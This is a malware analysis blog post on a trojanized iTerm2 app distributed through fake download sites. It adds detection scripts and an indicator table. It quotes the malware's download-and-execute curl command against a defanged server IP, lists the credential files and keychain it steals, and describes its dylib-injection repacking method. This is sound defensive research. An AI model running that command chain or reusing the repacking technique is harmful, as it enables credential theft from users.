Mac Users Targeted by Trojanized iTerm2 App


We go into more detail about a fake version of the iTerm2 app that downloads and runs malware, detected by Trend Micro as TrojanSpy.Python.ZURU.A, which collects private data from a victim's machine.
By: Steven Du, Luis Magisa

September 30, 2021


Earlier this month, a user on the Chinese question-and-answer website Zhihu reported that a search engine result for the keyword "iTerm2" led to a fake website called iterm2.net that mimics the legitimate iterm2.com (Figure 1). A fake version of the iTerm2 app, a macOS terminal emulator, can be downloaded from a link found on iterm2.net. When this app is executed, it downloads and runs g.py, a malicious Python script, from 47[.]75[.]123[.]111. This malware, which Trend Micro detects as TrojanSpy.Python.ZURU.A, collects private data from the victim's machine.

Figure 1. The fraudulent website iterm2.net

Objective-See previously published a blog entry about this malware, which analyzed how the threat actor repacks the iTerm2 app to load the malicious libcrypto.2.dylib. This library, in turn, downloads and runs other components, including the aforementioned g.py script and a Mach-O file called "GoogleUpdate" that contains a Cobalt Strike beacon payload. This blog entry covers the malware's details.
The trojanized app
As of September 15, iterm2.net is still active. However, the malicious file is not hosted on this website directly. Instead, the website contains a link, hxxp://www.kaidingle.com/iTerm/iTerm.dmg, from which users download a macOS disk image (DMG) called iTerm.dmg. The user is redirected to this same download URL regardless of which app version they select on the fake website; the real iterm2.com site has different URLs and files for each version. The files downloaded from the legitimate website come as ZIP archives, as opposed to the DMG file from the fraudulent website, as shown in Figure 2.

Figure 2. The file downloaded from the fake website (left) and the official website (right)

Comparing the folder structure of the DMG and ZIP files reveals a number of differences between them:

All the Mach-O files in the trojanized iTerm2 app were signed with an Apple Distribution certificate, as shown in Figure 3, whereas the files in the legitimate iTerm2.app are code signed with a Developer ID Application certificate. According to Apple's documentation, an Apple Distribution certificate is only used to sign an app before the developer submits it to the App Store (Apple re-signs the app on delivery), so apps downloaded from the App Store normally do not carry an Apple Distribution signature, and apps distributed outside the App Store should never carry one. An Apple Distribution-signed app also cannot be notarized, so Gatekeeper will refuse it unless the user deliberately bypasses the check.

Figure 3. Trojanized iTerm2 app code signing
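The signing-identity check described above can be automated from the report that Apple's `codesign -dvv` command prints (to stderr). The helper below is an added example, not code from the original post, from Trend Micro or from the iTerm2 project. The two `codesign` transcripts embedded in it are constructed to follow the tool's output format; the developer name and team identifier in them are placeholders, not iTerm2's real values.

```python
import re
import subprocess

# Constructed transcript of `codesign -dvv iTerm.app` for a build signed with a
# Developer ID Application certificate. Developer name and team ID are placeholders.
LEGIT_OUTPUT = """\
Executable=/Applications/iTerm.app/Contents/MacOS/iTerm2
Identifier=com.googlecode.iterm2
Format=app bundle with Mach-O universal (x86_64 arm64)
CodeDirectory v=20500 size=1200 flags=0x10000(runtime) hashes=28+7 location=embedded
Signature size=8900
Authority=Developer ID Application: Example Developer (TEAMID1234)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
Timestamp=1 Sep 2021 at 10:00:00
TeamIdentifier=TEAMID1234
Sealed Resources version=2 rules=13 files=120
"""

# Constructed transcript for a repacked bundle signed with an Apple Distribution
# certificate, the App Store-only identity the trojanized iTerm2 carried.
TROJAN_OUTPUT = """\
Executable=/Volumes/iTerm/iTerm.app/Contents/MacOS/iTerm2
Identifier=com.googlecode.iterm2
Format=app bundle with Mach-O thin (x86_64)
CodeDirectory v=20400 size=1200 flags=0x0(none) hashes=28+7 location=embedded
Signature size=4400
Authority=Apple Distribution: Example Developer (TEAMID1234)
Authority=Apple Worldwide Developer Relations Certification Authority
Authority=Apple Root CA
TeamIdentifier=TEAMID1234
Sealed Resources version=2 rules=13 files=121
"""

# codesign prints the certificate chain leaf-first, one "Authority=" line per certificate.
AUTHORITY_RE = re.compile(r"^Authority=([^:\n]+?)(?::\s*(.*))?$", re.M)


def leaf_authority(codesign_output):
    """(certificate type, subject) of the leaf signing certificate, or (None, None) if there is none."""
    m = AUTHORITY_RE.search(codesign_output)
    if not m:
        return None, None
    return m.group(1).strip(), (m.group(2) or "").strip()


def assess_signature(codesign_output, from_app_store=False):
    """Classify the signer the way a triage analyst would for a downloaded .app.

    Developer ID Application is the only identity Apple issues for distribution outside
    the App Store, and the only one that can be notarized. An Apple Distribution leaf
    on a bundle that did not come from the App Store means someone signed it with an
    App Store-only identity, which is exactly the anomaly in the trojanized iTerm2.
    """
    if "Signature=adhoc" in codesign_output:
        return "adhoc"
    cert_type, _subject = leaf_authority(codesign_output)
    if cert_type is None:
        return "unsigned"
    if cert_type == "Developer ID Application":
        return "ok-developer-id"
    if cert_type == "Apple Distribution":
        return "ok-app-store" if from_app_store else "suspicious-app-store-identity-outside-store"
    return "unknown-authority:" + cert_type


def assess_bundle(path):
    """Run codesign on a real bundle (macOS only) and classify it; codesign writes its report to stderr."""
    proc = subprocess.run(["codesign", "-dvv", path], capture_output=True, text=True)
    return assess_signature(proc.stderr + proc.stdout)
```

Pair this with `spctl -a -t exec -vv iTerm.app`, which asks Gatekeeper directly whether it would accept the bundle; a Developer ID build that is notarized is accepted, an Apple Distribution-signed download is rejected. Comparing the `TeamIdentifier` line against the team ID the real project publishes is a second, independent check, since a valid Developer ID signature from the wrong team is just as much a repack.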

The trojanized iTerm2 app contains a file called libcrypto.2.dylib (SHA-256 2c269ff4216dc6a14fd81ffe541994531b23a1d8e0fbd75b9316a9fa0e0d5fef) in its Frameworks folder, which does not exist in the legitimate version, as shown in Figure 4.

Figure 4. The libcrypto.2.dylib file added to the trojanized iTerm2 app

In the trojanized iTerm2 app, the main Mach-O executable has an additional LC_LOAD_DYLIB load command that makes the dynamic linker load libcrypto.2.dylib at launch, as shown in Figure 5.

Figure 5. The load command LC_LOAD_DYLIB loads the file libcrypto.2.dylib

According to Objective-See's blog post, the malicious code in libcrypto.2.dylib runs automatically when the victim launches the trojanized iTerm2 app, since dyld maps every LC_LOAD_DYLIB dependency and runs its initializers before the app's own code. This is a clever method of repacking legitimate apps that we had not seen before.
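One way to surface the extra LC_LOAD_DYLIB described above is to walk the Mach-O load commands and diff the list of imported dylibs against the legitimate build (on macOS, `otool -L` prints the same list). The parser below is an added example, not code from the original post, from Objective-See or from the iTerm2 project. It builds two constructed minimal Mach-O images (a thin arm64 one and a universal wrapper around two slices) rather than reading the real binaries; the baseline import list and the `@executable_path/../Frameworks/libcrypto.2.dylib` install name are assumptions for illustration, not values taken from the samples.

```python
import struct

MH_MAGIC, MH_MAGIC_64 = 0xFEEDFACE, 0xFEEDFACF
MH_CIGAM, MH_CIGAM_64 = 0xCEFAEDFE, 0xCFFAEDFE   # byte-swapped (big-endian) images
FAT_MAGIC = 0xCAFEBABE                            # universal binary wrapper, always big-endian
CPU_TYPE_ARM64, CPU_TYPE_X86_64 = 0x0100000C, 0x01000007
MH_EXECUTE = 2

# Every load command that makes dyld map another image at launch.
DYLIB_LOAD_CMDS = {
    0x0000000C: "LC_LOAD_DYLIB",
    0x80000018: "LC_LOAD_WEAK_DYLIB",
    0x8000001F: "LC_REEXPORT_DYLIB",
    0x80000023: "LC_LOAD_UPWARD_DYLIB",
}


def _thin_slices(blob):
    """Yield (offset, size) for each thin Mach-O inside blob; a thin file is a single slice."""
    if struct.unpack(">I", blob[:4])[0] == FAT_MAGIC:
        (nfat,) = struct.unpack(">I", blob[4:8])
        for i in range(nfat):
            _cpu, _sub, off, size, _align = struct.unpack(">5I", blob[8 + 20 * i:28 + 20 * i])
            yield off, size
    else:
        yield 0, len(blob)


def linked_dylibs(blob):
    """Return [(load_command, install_name), ...] across every architecture in blob."""
    found = []
    for off, size in _thin_slices(blob):
        img = blob[off:off + size]
        magic = struct.unpack("<I", img[:4])[0]
        if magic in (MH_MAGIC, MH_MAGIC_64):
            end = "<"
        elif magic in (MH_CIGAM, MH_CIGAM_64):
            end, magic = ">", struct.unpack(">I", img[:4])[0]
        else:
            raise ValueError("not a Mach-O image at offset %d" % off)
        header_len = 32 if magic == MH_MAGIC_64 else 28
        ncmds, sizeofcmds = struct.unpack(end + "II", img[16:24])
        pos, end_of_cmds = header_len, header_len + sizeofcmds
        for _ in range(ncmds):
            cmd, cmdsize = struct.unpack(end + "II", img[pos:pos + 8])
            if cmdsize < 8 or pos + cmdsize > end_of_cmds:
                raise ValueError("malformed load command at offset %d" % pos)
            if cmd in DYLIB_LOAD_CMDS:
                # dylib_command: cmd, cmdsize, then struct dylib whose lc_str offset is relative to the command start
                (name_off,) = struct.unpack(end + "I", img[pos + 8:pos + 12])
                name = img[pos + name_off:pos + cmdsize].split(b"\0", 1)[0]
                found.append((DYLIB_LOAD_CMDS[cmd], name.decode("utf-8", "replace")))
            pos += cmdsize
    return found


def unexpected_dylibs(blob, baseline):
    """Install names dyld would load that the known-good build does not import."""
    return sorted({name for _, name in linked_dylibs(blob)} - set(baseline))


# ---- Constructed test images (not the real iTerm2 binaries) ----
def _dylib_cmd(cmd, install_name):
    name = install_name.encode() + b"\0"
    pad = (-(24 + len(name))) % 8                  # load commands are 8-byte aligned in 64-bit images
    return struct.pack("<6I", cmd, 24 + len(name) + pad, 24, 0, 0x10000, 0x10000) + name + b"\0" * pad


def build_thin(install_names, cputype=CPU_TYPE_ARM64):
    """Minimal 64-bit Mach-O: header plus one LC_LOAD_DYLIB per install name, nothing else."""
    cmds = b"".join(_dylib_cmd(0x0C, n) for n in install_names)
    header = struct.pack("<8I", MH_MAGIC_64, cputype, 0, MH_EXECUTE, len(install_names), len(cmds), 0, 0)
    return header + cmds


def build_fat(slices):
    """Wrap thin images in a universal header; real files page-align slices, but a reader only needs the recorded offsets."""
    archs, bodies = b"", b""
    base = 8 + 20 * len(slices)
    for cputype, img in slices:
        archs += struct.pack(">5I", cputype, 0, base + len(bodies), len(img), 0)
        bodies += img
    return struct.pack(">II", FAT_MAGIC, len(slices)) + archs + bodies


# Assumed import list of the legitimate build (illustrative; derive the real one from the official ZIP with `otool -L`).
BASELINE = [
    "/usr/lib/libSystem.B.dylib",
    "/System/Library/Frameworks/Cocoa.framework/Versions/A/Cocoa",
]
# Assumed install name the repacked binary would carry for the injected library.
INJECTED = "@executable_path/../Frameworks/libcrypto.2.dylib"

LEGIT_IMAGE = build_fat([(CPU_TYPE_X86_64, build_thin(BASELINE, CPU_TYPE_X86_64)),
                         (CPU_TYPE_ARM64, build_thin(BASELINE))])
TROJAN_IMAGE = build_thin(BASELINE + [INJECTED])

if __name__ == "__main__":
    print("legit  :", unexpected_dylibs(LEGIT_IMAGE, BASELINE))    # []
    print("trojan :", unexpected_dylibs(TROJAN_IMAGE, BASELINE))   # [INJECTED]
```

The diff against a baseline matters more than the parse: a single extra install name under `@executable_path/../Frameworks/` or `@rpath/` in a binary whose hash no longer matches the vendor's release is the repacking signature, and it survives even if the injected library is renamed to something less obvious than libcrypto.2.dylib.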
Once executed, the malware connects to its server and receives the following instruction from it:

"curl -sfo /tmp/g.py http://47[.]75[.]123[.]111/g.py && chmod 777 /tmp/g.py && python /tmp/g.py && curl -sfo /tmp/GoogleUpdate http://47[.]75[.]123[.]111/GoogleUpdate && chmod 777 /tmp/GoogleUpdate && /tmp/GoogleUpdate"
Download the g.py script to /tmp/g.py and execute it
Download "GoogleUpdate" to /tmp/GoogleUpdate and execute it
Collect data using the g.py script
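The one-liner above is the whole infection chain: fetch to /tmp, make it executable, run it (`curl -sfo` is silent, fails quietly on HTTP errors and writes to the named file). The script below is added detection logic, not code from the original post or from Trend Micro. It takes shell command lines as an EDR or auditd-style process log would record them, splits each into its chained steps and reports every downloaded path that is later chmod'ed or executed in the same chain. The first log record is the C2 instruction quoted in the post; the other two records are constructed, one benign fetch-then-parse and one wget variant of the same pattern.

```python
import re
import shlex

# Constructed process-execution records. Record 0 is the C2 instruction quoted in the post;
# records 1 and 2 are made up: a benign fetch-then-parse and a wget drop-and-run variant.
SAMPLE_LOG = [
    "curl -sfo /tmp/g.py http://47[.]75[.]123[.]111/g.py && chmod 777 /tmp/g.py && python /tmp/g.py && "
    "curl -sfo /tmp/GoogleUpdate http://47[.]75[.]123[.]111/GoogleUpdate && chmod 777 /tmp/GoogleUpdate && /tmp/GoogleUpdate",
    "curl -sfo /tmp/release.json https://example.invalid/api/releases && jq .tag_name /tmp/release.json",
    "wget -q -O /var/tmp/.cache https://example.invalid/x ; chmod +x /var/tmp/.cache ; /var/tmp/.cache",
]

INTERPRETERS = {"python", "python2", "python3", "sh", "bash", "zsh", "perl", "ruby", "osascript"}


def _download_target(argv):
    """(url, output_path) if argv is a curl/wget invocation that writes to a file, else None."""
    tool = argv[0].rsplit("/", 1)[-1]
    if tool not in ("curl", "wget"):
        return None
    url = out = None
    i = 1
    while i < len(argv):
        a = argv[i]
        takes_path = (
            (tool == "curl" and (a == "--output" or (a.startswith("-") and not a.startswith("--") and a.endswith("o"))))
            or (tool == "wget" and a in ("-O", "--output-document"))
        )
        if takes_path and i + 1 < len(argv):
            out = argv[i + 1]          # curl lets the last short flag of a cluster take the argument: -o, -so, -sfo, -Lo
            i += 1
        elif "://" in a:
            url = a
        i += 1
    return (url, out) if url and out else None


def find_drop_and_run(cmdline):
    """Findings for one command line: each downloaded path later chmod'ed or executed in the same chain."""
    dropped = {}                                   # output path -> finding
    for segment in re.split(r"&&|\|\||;", cmdline):
        argv = shlex.split(segment)
        if not argv:
            continue
        dl = _download_target(argv)
        if dl:
            url, path = dl
            dropped[path] = {"url": url, "path": path, "chmod": None, "executed_by": None}
            continue
        exe = argv[0].rsplit("/", 1)[-1]
        if exe == "chmod" and len(argv) >= 3:
            for p in argv[2:]:
                if p in dropped:
                    dropped[p]["chmod"] = argv[1]
        elif argv[0] in dropped:                   # the dropped file is run directly
            dropped[argv[0]]["executed_by"] = "direct"
        elif exe in INTERPRETERS:                  # or handed to an interpreter, as g.py is
            for p in argv[1:]:
                if p in dropped:
                    dropped[p]["executed_by"] = exe
    return [f for f in dropped.values() if f["chmod"] or f["executed_by"]]


def scan_log(lines):
    """Run the check across many records, tagging each finding with the record index."""
    return [dict(f, line=idx) for idx, line in enumerate(lines) for f in find_drop_and_run(line)]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Splitting on `&&`, `||` and `;` before tokenizing is deliberately simple and will misparse those operators inside quotes; in a real pipeline, prefer the per-process records (parent iTerm2, child curl, child chmod, child python with the same path) over re-parsing the shell string, since the chain is visible there regardless of how it was written.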

The Python script g.py collects the following system data and files from the victim's machine and sends them to the server:

Operating system information
Username
Installed applications
Local IP address
Copies of these files and folders:
~/.bash_history
~/.zsh_history
~/.gitConfig
/etc/hosts
~/.ssh
~/.zhHistory
~/Library/Keychains/Login.keychain-db
~/Library/Application Support/VanDyke/SecureCRT/Config/
~/Library/Application Support/iTerm2/SavedState/

The contents of these directories:
~/ (current user home directory)
~/Desktop
~/Documents
~/Downloads
/Applications

Other trojanized apps and fake sites
Further analysis of the trojanized iTerm2 app's Apple Distribution certificate led us to similar trojanized apps on VirusTotal (Table 1), all of which were trojanized using the same method.

Table 1. Other trojanized apps found on VirusTotal

File Name | SHA-256 Hash | Detection
iTerm.app.zip | 5f59ead37fa836c6329a7ba3edd4afc9a2c5fec61de4e0cdb8e8a41031ae4db0 | TrojanSpy.MacOS.ZURU.A
SecureCRT.dmg | ae0510032cd4699ef17de7ed1587918ffcd7ff7c9a77fc45f9d68effe2934132 | Trojan.MacOS.ZuRu.PFH
SecureCRT.dmg | 1e462f8716275dbae6acb3ff4f7a95624c1afb23c5069fa42a14ed49c2588921 | Trojan.MacOS.ZuRu.PFH
Microsoft Remote Desktop.dmg | 5ca2fb207762e886dd3336cf1cb92c28f096a5fbb1798ea6721b7c94c1395259 | TrojanSpy.MacOS.ZURU.A
Navicat15_cn.dmg | 6df91af12c87874780cc9d49e700161e1ead71ae045954adbe7633ec9e5e45ff | TrojanSpy.MacOS.ZURU.A
Navicat15_cn.dmg | 91541cfc0474d6c06376460759517ae94f36fca74d5ab84cf5c23d98bd33939e | TrojanSpy.MacOS.ZURU.A

Searching VirusTotal for the Secure Sockets Layer (SSL) certificate thumbprint that iterm2.net used revealed a number of other fraudulent websites. As shown in Figure 6, all of these websites resolved to the same IP address, 43[.]129[.]218[.]115.

Figure 6. Other fake websites found on VirusTotal

We were able to access one of these fake websites, snailsvn.cn, but the download link on its page was empty at the time, so it remains uncertain whether this website had been used to distribute a trojanized version of SnailSVN, an Apache Subversion (SVN) client for Mac OS X, in the wild (Figure 7). All of these domains were inaccessible at the time of writing.

Figure 7. The fake SnailSVN website

Download server
The server hosting the trojanized packages, kaidingle[.]com, was registered on September 7 and is still active. According to VirusTotal, apart from iTerm.dmg, it also hosts other DMG files such as SecureCRT.dmg and Navicat15_cn.dmg (Figure 8). As of September 18, the latter two DMG files could still be downloaded from the server.

Figure 8. URLs related to the download server

Based on the server's WHOIS record, four other domains are registered under the same registrant (Figure 9). So far, however, none of these domains show any indication that they are related to malware.

Figure 9. Other domains from the same registrant

Second-stage server
VirusTotal recorded several URLs related to a second-stage server at the IP address 47[.]75[.]123[.]111, the same address that hosts the malicious g.py script, between September 8 and 17, as shown in Figure 10.

Figure 10. URLs under the second-stage server

Besides the g.py script and the "GoogleUpdate" component that are part of the trojanized iTerm app's routine, the second-stage server also hosts four other Mach-O files that are used as post-exploitation tools (Table 2).

Table 2. Other Mach-O files hosted on the second-stage server

File Name | SHA-256 Hash | Description/Detection
la | 79ef23214c61228a03faea00a1859509ea3bf0247219d65ae6de335fde4061f5 | An open source intranet penetration scanner framework (https://github.com/k8gege/LadonGo)
iox | f005ea1db6da3f56e4c8b1135218b1da56363b077d3be7d218d8284444d7824f | A tool for port forwarding and intranet proxying (https://github.com/EddieIvan01/iox)
netscan-darwin-amd64 | d12ef7f6de48c09e84143e90fe4a4e7b1b3d10cee5cd721f7fdf61e62e08e749 | Netscan scans a network for open ports on an IP address or range and for IP addresses in use on that network (https://github.com/jessfraz/netscan/releases)
Host | a83edc0eb5a2f1db62acfa60c666b5a5c53733233ce264702a16cb5220df9d4e | Backdoor.MacOS.Wirenet.PFH

Notably, the IP address of the second-stage server is close to the one "GoogleUpdate" connects to, 47[.]75[.]96[.]198. Both addresses are hosted by Alibaba Hong Kong. As shown in Figure 11, the URLs under 47[.]75[.]96[.]198 were recorded around the same time as those on the second-stage server, which suggests that both servers were set up by the same threat actor.

Figure 11. URLs under the same server as "GoogleUpdate"

Advertisement sites
As detailed in the user report mentioned above, the first item in the search engine results was under the subdomain rjxz.jxhwst.top. Searching for this address in Google returns two results that lead only to Google's cache (Figure 12); as of this writing, the actual pages are already down.

Figure 12. Google caches of the two fake sites

The first search result, titled "Microsoft Remote Desktop," has the address hxxp://rjxz.jxhwst.top/3, but based on its cache (Figure 13) and source code (Figure 14), we found that it redirected visitors to a fake website, hxxp://remotedesktop.vip.

Figure 13. The cache of the fake "Microsoft Remote Desktop" page

Figure 14. The source code of the fake page

Upon checking its main page, we discovered that the second-level domain jxhwst.top belongs to an agriculture company in northern China. Apart from rjxz.jxhwst.top, this second-level domain has 44 other subdomains, most of which serve advertisements that have no relation to the agriculture company (Figure 15). It is possible that the company rents out these subdomains to others for advertising but cannot prevent them from being used for illegal purposes. If so, the threat actor rents the subdomain for malware distribution.

Figure 15. The subdomains of the agriculture company

Security recommendations
To protect systems from threats like this, end users should only download apps from official and legitimate sources. They should be wary of search engine results, and always double-check URLs to make sure they really point to the official sites. Mac users can consider multilayered security solutions such as Trend Micro Antivirus for Mac®, which provides enhanced anti-scam protection that flags and blocks scam websites attempting to steal personal data. Antivirus for Mac is also available as part of Trend Micro Maximum Security, a multi-platform solution that provides comprehensive protection and multidevice security against cyberthreats.

Indicators of Compromise (IOCs)

File Name | SHA-256 Hash | Detection
SecureCRT.dmg | 1e462f8716275dbae6acb3ff4f7a95624c1afb23c5069fa42a14ed49c2588921 | TrojanSpy.MacOS.ZURU.A
com.microsoft.rdc.macos | 5ca2fb207762e886dd3336cf1cb92c28f096a5fbb1798ea6721b7c94c1395259 | TrojanSpy.MacOS.ZURU.A
iTerm.app.zip | 5f59ead37fa836c6329a7ba3edd4afc9a2c5fec61de4e0cdb8e8a41031ae4db0 | TrojanSpy.MacOS.ZURU.A
Navicat15_cn.dmg | 6df91af12c87874780cc9d49e700161e1ead71ae045954adbe7633ec9e5e45ff | TrojanSpy.MacOS.ZURU.A
Navicat15_cn.dmg | 91541cfc0474d6c06376460759517ae94f36fca74d5ab84cf5c23d98bd33939e | TrojanSpy.MacOS.ZURU.A
SecureCRT.dmg | ae0510032cd4699ef17de7ed1587918ffcd7ff7c9a77fc45f9d68effe2934132 | TrojanSpy.MacOS.ZURU.A
iTerm.dmg | e5126f74d430ff075d6f7edcae0c95b81a5e389bf47e4c742618a042f378a3fa | TrojanSpy.MacOS.ZURU.A
Microsoft Remote Desktop.dmg | 4e8287b61b0269e0d704c6d064cb584c1378e9b950539fea366ee304f695743f | TrojanSpy.MacOS.ZURU.A
libcrypto.2.dylib | 4aece9a7d73c1588ce9441af1df6856d8e788143cd9e53a2e9cf729e23877343 | TrojanSpy.MacOS.ZURU.A
libcrypto.2.dylib | 4e8287b61b0269e0d704c6d064cb584c1378e9b950539fea366ee304f695743f | TrojanSpy.MacOS.ZURU.A
libcrypto.2.dylib | 8db4f17abc49da9dae124f5bf583d0645510765a6f7256d264c82c2b25becf8b | TrojanSpy.MacOS.ZURU.A
libcrypto.2.dylib | 62cae3c971ed01c61454e4c3d9a8439cdcb409a8e1c5641e5c7c4ac7667cb5e5 | TrojanSpy.MacOS.ZURU.A
libcrypto.2.dylib | aba7c61d2c16cdae17785a38b070df57aa3009f00686881642be31a589fabe0a | TrojanSpy.MacOS.ZURU.A
libcrypto.2.dylib | af2cb957387b7c4b0c5c9fa24a711988c9e8802e758622b321c9bdc5720120d2 | TrojanSpy.MacOS.ZURU.A
libcrypto.2.dylib | e8184e1169373e2d529f23b9842f258dddc1d24c77ced0d12b08959967dfadef | TrojanSpy.MacOS.ZURU.A
libcrypto.2.dylib | 2c269ff4216dc6a14fd81ffe541994531b23a1d8e0fbd75b9316a9fa0e0d5fef | TrojanSpy.MacOS.ZURU.A
g.py | ffb0a802fdf054d4988d68762d9922820bdc3728f0378fcd6c4ed28c06da5cf0 | TrojanSpy.Python.ZURU.A

MITRE Tactics, Techniques, and Procedures (TTPs)
